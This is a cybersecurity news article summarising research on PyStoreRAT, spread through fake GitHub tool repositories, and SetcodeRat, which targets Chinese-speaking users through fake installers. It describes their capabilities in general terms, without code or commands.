- A new Malware campaign uses GitHub-hosted Python repositories to distribute a JavaScript Remote Access Trojan called PyStoreRAT.
- PyStoreRAT is modular with multi-stage capabilities and delivers an information stealer named Rhadamanthys as a secondary payload.
- The malware deploys through fake OSINT and development tools, exploiting GitHub trust and social media promotion to attract users.
- PyStoreRAT gathers system data, monitors antivirus products, and persists via scheduled tasks disguised as legitimate updates.
- Another distinct RAT, SetcodeRat, targets Chinese-speaking users by region and language checks and spreads via fake installers.
Cybersecurity researchers have uncovered a new malware campaign that distributes a previously undocumented JavaScript-based Remote Access Trojan (RAT), named PyStoreRAT, through Github-hosted Python repositories. The campaign emerged in mid-June 2025 and abuses repositories disguised as OSINT utilities, DeFi bots, GPT wrappers, and other tools designed to appeal to developers and analysts. According to researcher Yonatan Edri, these repos contain minimal code that silently downloads and executes a remote HTA file using “mshta.exe,” triggering the malware infection.
PyStoreRAT operates as a modular, multi-stage implant able to run various payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. Its infection chain culminates in deploying the Rhadamanthys information stealer. The attackers boost the repositories’ visibility on GitHub’s trending lists by inflating star and fork numbers and promote them through social media platforms like YouTube and X. The malware authors often introduce malicious payloads disguised as “maintenance” commits after the tools gain popularity.
Once executed, the malware profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet files linked to platforms such as Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. It performs antivirus checks looking for products like CrowdStrike Falcon and Cybereason to evade detection. Persistence is maintained by creating a scheduled task disguised as an NVIDIA app self-update. The implant communicates with an external server to receive commands, including downloading and running various payload types, executing PowerShell commands in memory, spreading via removable drives by replacing files with malicious shortcuts, and deleting its task to erase forensic traces.
Separate from PyStoreRAT, a new RAT called SetcodeRat has been identified targeting Chinese-speaking regions since October 2025. The malware disguises itself as legitimate installers for popular software and only proceeds if the victim’s system language matches Mainland China, Hong Kong, Macao, or Taiwan, exiting otherwise. It also requires a successful connection to a specific Bilibili URL before continuing. The payload includes a DLL that executes the RAT, which connects via Telegram or a command-and-control server to gather system data, capture screenshots, log keystrokes, run processes, and update itself. Details were shared by QiAnXin Threat Intelligence Center.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Vanguard Calls Bitcoin a “Speculative Digital Toy,” Warns Investors
- OCC Grants National Trust Bank Status to Circle, Ripple, Paxos, Others
- Crypto Veteran Jill Gunter Loses $30K in Thirdweb Contract Hack
- Figure Technology files SEC for native equity on Solana blockchain
- Nasdaq Proposes Tougher Rules to Curb Volatile Small-Cap IPOs
